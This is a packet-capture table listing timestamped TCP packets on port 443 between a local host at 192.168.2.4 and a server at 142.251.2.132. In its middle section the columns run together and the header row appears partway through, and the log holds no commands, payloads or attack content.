Apr 24, 2024 10:12:01.591331959 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.602967024 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.603054047 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.603091002 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:01.603106022 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.603148937 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:01.615103006 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.627203941 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.627260923 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:01.627269030 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.633505106 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.633562088 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:01.633568048 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.649148941 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.649230003 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:01.649236917 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.673685074 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.673753977 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:01.673760891 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.678648949 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.678709984 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:01.678716898 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.688478947 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.688627958 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:01.688636065 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.697128057 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.697181940 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:01.697189093 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.705796003 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.705887079 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:01.705916882 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.714348078 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.714446068 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:01.714474916 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.722866058 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.722966909 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:01.722987890 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.731455088 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.731645107 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:01.731654882 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.739876032 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.739952087 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:01.739969969 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.748382092 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.748450994 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:01.748461008 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.761102915 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.761187077 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.761187077 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:01.761219025 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.761262894 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:01.769660950 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.778265953 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.778309107 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.778356075 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:01.778367996 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.778407097 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:01.786674976 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.795176029 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.795217037 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.795310974 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:01.795330048 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.795375109 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:01.803356886 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.810633898 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.810713053 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.810714960 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:01.810739994 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.810779095 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:01.818094015 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.825584888 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.825664043 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:01.825674057 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.833146095 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.833230019 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.833231926 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:01.833255053 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.833297014 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:01.840190887 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.847431898 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.847502947 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:01.847512960 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.854677916 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.854736090 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:01.854743004 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.858961105 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.859016895 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:01.859024048 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.866309881 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.866372108 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:01.866379023 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.873281956 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.873354912 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:01.873362064 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.877388954 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.877446890 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:01.877458096 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.884658098 CEST  443          49731      142.251.2.132  192.168.2.4
                                                                            Apr 24, 2024 10:12:01.884712934 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.884721041 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.888505936 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.888561010 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.888569117 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.890621901 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.890671968 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.890678883 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.894988060 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.895036936 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.895042896 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.900836945 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.900899887 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.900907040 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.903383017 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.903440952 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.903448105 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.907274008 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.907337904 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.907346010 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.911358118 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.911407948 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.911413908 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.918621063 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.918694973 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.918703079 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.921715021 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.921772957 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.921780109 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.929568052 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.929657936 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.929666042 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.930305004 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.930354118 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.930361032 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.935965061 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.936031103 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.936041117 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.938636065 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.938690901 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.938698053 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.942493916 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.942543030 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.942549944 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.947284937 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.947338104 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.947344065 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.949541092 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.949618101 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.949625015 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.953020096 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.953107119 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.953114986 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.956710100 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.956779957 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.956789017 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.960374117 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.960419893 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.960428953 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.964334965 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.964397907 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.964405060 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.968272924 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.968388081 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.968394995 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.970068932 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.970133066 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.970140934 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.974409103 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.974483967 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.974490881 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.977602959 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.977650881 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.977658987 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.981400967 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.981451988 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.981457949 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.984183073 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.984237909 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.984245062 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.988049984 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.988095999 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.988106966 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.991520882 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.991580963 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.991588116 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.994841099 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.994891882 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.994898081 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.998682976 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.998739004 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.998745918 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.002264977 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.002314091 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.002320051 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.005085945 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.005141020 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.005146980 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.010338068 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.010423899 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.010507107 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.010514021 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.010546923 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.013374090 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.017896891 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.017955065 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.017962933 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.021011114 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.021056890 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.021169901 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.021177053 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.021223068 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.023355961 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.028959036 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.029016018 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.029023886 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.030560017 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.030615091 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.030621052 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.032748938 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.032807112 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.032820940 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.032829046 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.032869101 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.036640882 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.039573908 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.039640903 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.039649963 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.041949034 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.042015076 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.042021036 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.045039892 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.045104027 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.045111895 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.048064947 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.048116922 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.048124075 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.050446987 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.050504923 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.050513029 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.052666903 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.052737951 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.052747011 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.055697918 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.055757046 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.055766106 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.058737993 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.058796883 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.058804035 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.061319113 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.061371088 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.061378002 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.064490080 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.064539909 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.064547062 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.067339897 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.067398071 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.067406893 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.069638968 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.069698095 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.069708109 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.073393106 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.073442936 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.073451996 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.075031042 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.075076103 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.075082064 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.077588081 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.077642918 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.077650070 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.082415104 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.082463026 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.082469940 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.085478067 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.085525036 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.085530996 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.086316109 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.086363077 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.086369038 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.088916063 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.088964939 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.088972092 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.091734886 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.091787100 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.091795921 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.094434023 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.094494104 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.094502926 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.095912933 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.095967054 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:02.095976114 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.098893881 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:02.098958015 CEST49731443192.168.2.4142.251.2.132
Timestamp                             Source Port  Dest Port  Source IP      Dest IP
Apr 24, 2024 10:12:02.098964930 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:02.100564003 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:02.100630999 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:02.100636005 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:02.103135109 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:02.103192091 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:02.103198051 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:02.105210066 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:02.105246067 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:02.105249882 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:02.107809067 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:02.107846022 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:02.107851028 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:02.110049963 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:02.110131025 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:02.110135078 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:02.112040997 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:02.112078905 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:02.112085104 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:02.114265919 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:02.114310026 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:02.114316940 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:02.117445946 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:02.117499113 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:02.117505074 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:02.119654894 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:02.119683027 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:02.119708061 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:02.119714022 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:02.119757891 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:02.121732950 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:02.124732018 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:02.124761105 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:02.124783039 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:02.124794960 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:02.124835014 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:02.126456022 CEST  443          49731      142.251.2.132  192.168.2.4
